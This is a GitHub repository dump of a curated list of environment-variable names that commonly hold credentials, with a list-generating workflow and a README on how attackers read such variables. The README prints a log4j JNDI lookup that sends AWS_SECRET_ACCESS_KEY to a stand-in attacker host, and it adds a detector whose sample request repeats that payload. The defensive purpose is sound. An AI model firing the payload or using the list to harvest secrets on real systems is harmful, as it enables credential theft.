├── .github
│   └── workflows
│       └── UpdateRawList.yml
├── CONTRIBUTING.md
├── README.md
└── raw_list.txt

/.github/workflows/UpdateRawList.yml:
--------------------------------------------------------------------------------
# This is a workflow to generate raw_list.txt based on README.md

name: UpdateRawList

on:
  # Triggers the workflow on push events, but only for the main branch
  push:
    branches: [ main ]

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2

      - name: Run command in terminal # Extract the "- NAME" bullet lines from README.md and write raw_list.txt
        run: |
          printf '%b\n' "$(sed -n '/^-\s*\w*.$/p' README.md | sed -r 's/^.{2}//')" > raw_list.txt

      - name: Commit files # commit the regenerated raw_list.txt
        run: |
          git config --local user.email "41898282+github-actions[bot]@users.noreply.github.com"
          git config --local user.name "github-actions[bot]"
          git add raw_list.txt
          # "git commit" exits non-zero when nothing changed; skip it in that case so the job does not fail
          git diff --cached --quiet || git commit -m "[BOT] Auto update raw_list.txt"

      - name: Push changes # push the commit back to the repository
        uses: ad-m/github-push-action@master
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          force: true
--------------------------------------------------------------------------------

/CONTRIBUTING.md:
--------------------------------------------------------------------------------
# Contributing to **Awesome list of secrets in environment variables [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)**

👍🎉 First off, thanks for taking the time to contribute! 🎉👍

Feel free to add more secrets in environment variables. Please use the template below:

---

```
## EXAMPLE_SERVICE_NAME
- EXAMPLE_SECRET_1
- EXAMPLE_SECRET_2

source: [https://EXAMPLE_DOCUMENTATION_LINK.com](https://EXAMPLE_DOCUMENTATION_LINK.com)
```

## EXAMPLE_SERVICE_NAME
- EXAMPLE_SECRET_1
- EXAMPLE_SECRET_2

source: [https://EXAMPLE_DOCUMENTATION_LINK.com](https://EXAMPLE_DOCUMENTATION_LINK.com)

---

### Please remember to add only **popular services and secrets** (tokens, passwords, logins, API keys...)

You don't need to modify **raw_list.txt**; it is auto-generated from README.md by a GitHub Action.

If you don't want to open a PR/commit, you can [add a new issue to the project](https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables/issues/new) to share extra secrets.

Thanks,

Maciej Pulikowski
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on [GitHub](https://github.com/Puliczek) and [Twitter](https://twitter.com/pulik_io)

---

# **Awesome list of secrets in environment variables [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)**

# 📝 Description

A list of secrets, passwords, API keys and tokens that are commonly stored in system environment variables.

**An environment variable** is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.

Much developer documentation recommends storing secrets in environment variables, but is that the best way to keep secrets?

An attacker can read the values of system environment variables by using exploits such as:
- CVE-2021-44228 JNDI log4j (Java) ([Read more...](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words#1-system-environment-variables))

  `${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}`

  This lookup returns the value of **AWS_SECRET_ACCESS_KEY**, or **NO_EXISTS** if the variable is not set.
- CVE-XXXX-XXXX Web browser attack (writeup/PoC coming soon to my GitHub; follow me on [GitHub](https://github.com/Puliczek) and [Twitter](https://twitter.com/pulik_io) 😉)
- and much more...

Because of that, I created a list of secrets in environment variables to help secure software.
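As an added example (not code from this repository), the following Python check shows how the list can be used defensively, in the spirit of the WAF practice recommended further down: it flags request fields that carry the `${env:...}` / `${jndi:...}` lookup syntax shown above, or any listed variable name, after undoing URL encoding. The variable subset, the sample request and the helper names are constructed for this example.

```python
"""Flag request fields that try to reach secret-bearing environment variables.
Added example, not part of the repository: names from raw_list.txt act as a
signature set, and the ${env:...} / ${jndi:...} lookup prefixes are matched too."""
import re
from urllib.parse import unquote

# Constructed subset of raw_list.txt; load the whole file in practice.
RAW_LIST = ["AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "GITHUB_TOKEN", "NPM_TOKEN"]
# Lookup prefixes resolved server-side: ${env:NAME}, ${env:NAME:-default}, ${jndi:...}
LOOKUP_RE = re.compile(r"\$\{\s*(env|jndi|sys)\s*:", re.IGNORECASE)

def normalize(value: str) -> str:
    """Undo repeated URL encoding, a common way to slip past naive filters."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def find_env_references(text: str, names=RAW_LIST) -> dict:
    """Return the lookup prefixes and listed variable names found in one field."""
    text = normalize(text)
    lookups = [m.group(0) for m in LOOKUP_RE.finditer(text)]
    found = [n for n in names if re.search(rf"\b{re.escape(n)}\b", text)]
    return {"lookups": lookups, "names": found}

def inspect_request(fields: dict, names=RAW_LIST) -> list:
    """Inspect every request field (path, headers, body); return (field, hit) alerts."""
    alerts = []
    for field, value in fields.items():
        hit = find_env_references(value, names)
        if hit["lookups"] or hit["names"]:
            alerts.append((field, hit))
    return alerts

# Constructed sample request modelled on the README's log4j example.
SAMPLE_REQUEST = {
    "path": "/login",
    "User-Agent": "${jndi:ldap://example.invalid/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}",
    "X-Forwarded-For": "%24%7Benv%3AGITHUB_TOKEN%7D",  # URL-encoded ${env:GITHUB_TOKEN}
    "body": "user=alice&pw=hunter2",
}

if __name__ == "__main__":
    for field, hit in inspect_request(SAMPLE_REQUEST):
        print(f"ALERT {field}: lookups={hit['lookups']} names={hit['names']}")
```

Matching bare variable names will also fire on benign text that merely mentions them, so in a real WAF treat the name-only hits as a lower-severity signal than the lookup-syntax hits.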
Some practices that reduce the risk of leaking secrets stored in environment variables:
- Block or alert on the WAF when a request contains the name of a system environment variable
- Store the path to a config file in the environment variable, instead of the plaintext value
- Encrypt the values stored in environment variables
- Use a different way to store secrets 🤓

![Environment variables](https://user-images.githubusercontent.com/12344862/147656611-8726c036-128b-4ad4-a19b-c019c2d6b1ea.png)

You can check your system environment variables:
- Windows: run `dir env:` in PowerShell
- Linux/macOS: run `printenv` or `env` in a terminal

# **Awesome list of secrets in environment variables**
# A
## AWS
- AWS_ACCESS_KEY_ID
- AWS_SECRET_ACCESS_KEY
- AMAZON_AWS_ACCESS_KEY_ID
- AMAZON_AWS_SECRET_ACCESS_KEY

source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html

## Algolia
- ALGOLIA_API_KEY

source: https://www.algolia.com/doc/framework-integration/symfony/getting-started/installation/?client=php

## Azure
- AZURE_CLIENT_ID
- AZURE_CLIENT_SECRET
- AZURE_USERNAME
- AZURE_PASSWORD
- MSI_ENDPOINT
- MSI_SECRET

source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet

source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406

# B
## Binance
- binance_api
- binance_secret

source: https://algotrading101.com/learn/binance-python-api-guide/

## Bittrex
- BITTREX_API_KEY
- BITTREX_API_SECRET

source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md

# C
## Cloud Foundry
- CF_PASSWORD
- CF_USERNAME

source: https://cli.cloudfoundry.org/en-US/v6/auth.html

## Code Climate
- CODECLIMATE_REPO_TOKEN

source: https://docs.codeclimate.com/docs/command-line-interface

## Coveralls
- COVERALLS_REPO_TOKEN

source: https://docs.coveralls.io/supported-ci-services

## CircleCI
- CIRCLE_TOKEN

source: https://circleci.com/docs/2.0/api-developers-guide/

# D
## DigitalOcean
- DIGITALOCEAN_ACCESS_TOKEN

source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean

## Docker Hub
- DOCKER_EMAIL
- DOCKER_PASSWORD
- DOCKER_USERNAME

source: https://github.com/marketplace/actions/publish-docker

## Docker Hub
- DOCKERHUB_PASSWORD

source: https://circleci.com/docs/2.0/env-vars/

# E
# F
## Fastlane products
- ITC_PASSWORD

source: https://github.com/phatblat/fastlane-variables

## Facebook
- FACEBOOK_APP_ID
- FACEBOOK_APP_SECRET
- FACEBOOK_ACCESS_TOKEN

## Firebase
- FIREBASE_TOKEN
- FIREBASE_API_TOKEN

source: https://firebase.google.com/docs/cli

## Fossa
- FOSSA_API_KEY

source: https://docs.fossa.com/docs/api-reference

# G
## GitHub
- GH_TOKEN
- GITHUB_TOKEN
- GH_ENTERPRISE_TOKEN
- GITHUB_ENTERPRISE_TOKEN

source: https://cli.github.com/manual/gh_help_environment

## GitLab
- CI_DEPLOY_PASSWORD
- CI_DEPLOY_USER

source: https://docs.gitlab.com/ee/user/project/deploy_tokens/

## Google Cloud
- GOOGLE_APPLICATION_CREDENTIALS
- GOOGLE_API_KEY

source: https://cloud.google.com/docs/authentication/getting-started#windows

## GitLab
- CI_DEPLOY_USER
- CI_DEPLOY_PASSWORD
- GITLAB_USER_LOGIN
- CI_JOB_JWT
- CI_JOB_JWT_V2
- CI_JOB_TOKEN

source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html

# H
## Heroku
- HEROKU_API_KEY
- HEROKU_API_USER

source: https://devcenter.heroku.com/articles/authentication

# I
# J
# K
# L
# M
## Mailgun
- MAILGUN_API_KEY

source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/

## MongoDB
- MCLI_PRIVATE_API_KEY
- MCLI_PUBLIC_API_KEY

source: https://docs.mongodb.com/mongocli/stable/configure/environment-variables/

# N
## NGROK
- NGROK_TOKEN
- NGROK_AUTH_TOKEN

source: -

## NPM
- NPM_TOKEN
- NPM_AUTH_TOKEN

source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow

# O
## OKTA
- OKTA_CLIENT_ORGURL
- OKTA_CLIENT_TOKEN
- OKTA_OAUTH2_CLIENTSECRET
- OKTA_OAUTH2_CLIENTID
- OKTA_AUTHN_GROUPID

source: https://developer.okta.com/okta-sdk-java/apidocs/com/okta/sdk/client/ClientBuilder.html

## Oracle OpenStack command-line client
- OS_USERNAME
- OS_PASSWORD

source: [https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html](https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html)

source: https://docs.oracle.com/cd/E78305_01/E78304/html/openstack-envars.html

# P
## Percy.io
- PERCY_TOKEN

source: https://docs.percy.io/docs/environment-variables

## PostgreSQL
- POSTGRES_PASSWORD

source: https://www.postgresql.org/docs/current/libpq-envars.html

# Q
# R
# S
## Sauce Labs
- SAUCE_ACCESS_KEY
- SAUCE_USERNAME

source: https://docs.saucelabs.com/basics/environment-variables/

## Sentry
- SENTRY_AUTH_TOKEN

source: https://docs.sentry.io/product/cli/configuration/

## Slack
- SLACK_TOKEN

source: https://slack.dev/node-slack-sdk/getting-started

## Square
- square_access_token
- square_oauth_secret

source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme

## Stripe
- STRIPE_API_KEY
- STRIPE_DEVICE_NAME

source: https://stripe.com/docs/cli/api_keys

## Surge
- SURGE_TOKEN
- SURGE_LOGIN

source: https://surge.sh/help/integrating-with-circleci

# T
## Twilio
- TWILIO_ACCOUNT_SID
- TWILIO_AUTH_TOKEN

source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html

## Twitter
- CONSUMER_KEY
- CONSUMER_SECRET

source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices

## Travis CI
- TRAVIS_SUDO
- TRAVIS_OS_NAME
- TRAVIS_SECURE_ENV_VARS

source: https://docs.travis-ci.com/user/environment-variables

## Telegram
- TELEGRAM_BOT_TOKEN

# U
# V
## Vault HashiCorp
- VAULT_TOKEN
- VAULT_CLIENT_KEY

source: https://www.vaultproject.io/docs/commands

## Vultr
- TOKEN
- VULTR_ACCESS
- VULTR_SECRET

source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops

# W
# X
# Y
# Z

## Get a raw list

The repository includes the raw list:

[raw_list.txt](https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables/blob/main/raw_list.txt)

It is auto-generated from README.md by a GitHub Action.

# 😎 Contributing
👍🎉 First off, thanks for taking the time to contribute! 🎉👍

If you would like to add more secrets:

[Please read and follow our Contributing guide](https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables/blob/main/CONTRIBUTING.md)

Thanks! 🦄

# 💻 Useful links

- [Stackoverflow - Is it secure to store passwords as environment variables (rather than as plain text) in config files?](https://stackoverflow.com/questions/12461484/is-it-secure-to-store-passwords-as-environment-variables-rather-than-as-plain-t)
- [Google - Best practices for securely using API keys](https://support.google.com/googleapi/answer/6310037?hl=en)
- [An Introduction to Environment Variables and How to Use Them](https://medium.com/chingu/an-introduction-to-environment-variables-and-how-to-use-them-f602f66d15fa)
- [Why you shouldn't use ENV variables for secret data](https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/)
- [The Triumph and Tragedy of .env Files](https://blog.doppler.com/the-triumph-and-tragedy-of-env-files)

# 🤝 Show your support

🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on [GitHub](https://github.com/Puliczek) and [Twitter](https://twitter.com/pulik_io)

# ✔️ Disclaimer
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.
--------------------------------------------------------------------------------

/raw_list.txt:
--------------------------------------------------------------------------------
AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
AMAZON_AWS_ACCESS_KEY_ID
AMAZON_AWS_SECRET_ACCESS_KEY
ALGOLIA_API_KEY
AZURE_CLIENT_ID
AZURE_CLIENT_SECRET
AZURE_USERNAME
AZURE_PASSWORD
MSI_ENDPOINT
MSI_SECRET
binance_api
binance_secret
BITTREX_API_KEY
BITTREX_API_SECRET
CF_PASSWORD
CF_USERNAME
CODECLIMATE_REPO_TOKEN
COVERALLS_REPO_TOKEN
CIRCLE_TOKEN
DIGITALOCEAN_ACCESS_TOKEN
DOCKER_EMAIL
DOCKER_PASSWORD
DOCKER_USERNAME
DOCKERHUB_PASSWORD
FACEBOOK_APP_ID
FACEBOOK_APP_SECRET
FACEBOOK_ACCESS_TOKEN
FIREBASE_TOKEN
FIREBASE_API_TOKEN
FOSSA_API_KEY
GH_TOKEN
GH_ENTERPRISE_TOKEN
CI_DEPLOY_PASSWORD
CI_DEPLOY_USER
GOOGLE_APPLICATION_CREDENTIALS
GOOGLE_API_KEY
CI_DEPLOY_USER
CI_DEPLOY_PASSWORD
GITLAB_USER_LOGIN
CI_JOB_JWT
CI_JOB_JWT_V2
CI_JOB_TOKEN
HEROKU_API_KEY
HEROKU_API_USER
MAILGUN_API_KEY
MCLI_PRIVATE_API_KEY
MCLI_PUBLIC_API_KEY
NGROK_TOKEN
NGROK_AUTH_TOKEN
NPM_AUTH_TOKEN
OKTA_CLIENT_ORGURL
OKTA_CLIENT_TOKEN
OKTA_OAUTH2_CLIENTSECRET
OKTA_OAUTH2_CLIENTID
OKTA_AUTHN_GROUPID
OS_USERNAME
OS_PASSWORD
PERCY_TOKEN
POSTGRES_PASSWORD
SAUCE_ACCESS_KEY
SAUCE_USERNAME
SENTRY_AUTH_TOKEN
SLACK_TOKEN
square_access_token
square_oauth_secret
STRIPE_API_KEY
STRIPE_DEVICE_NAME
SURGE_TOKEN
SURGE_LOGIN
TWILIO_ACCOUNT_SID
CONSUMER_KEY
CONSUMER_SECRET
TRAVIS_SUDO
TRAVIS_OS_NAME
TRAVIS_SECURE_ENV_VARS
TELEGRAM_BOT_TOKEN
VAULT_TOKEN
VAULT_CLIENT_KEY
TOKEN
VULTR_ACCESS
VULTR_SECRET
--------------------------------------------------------------------------------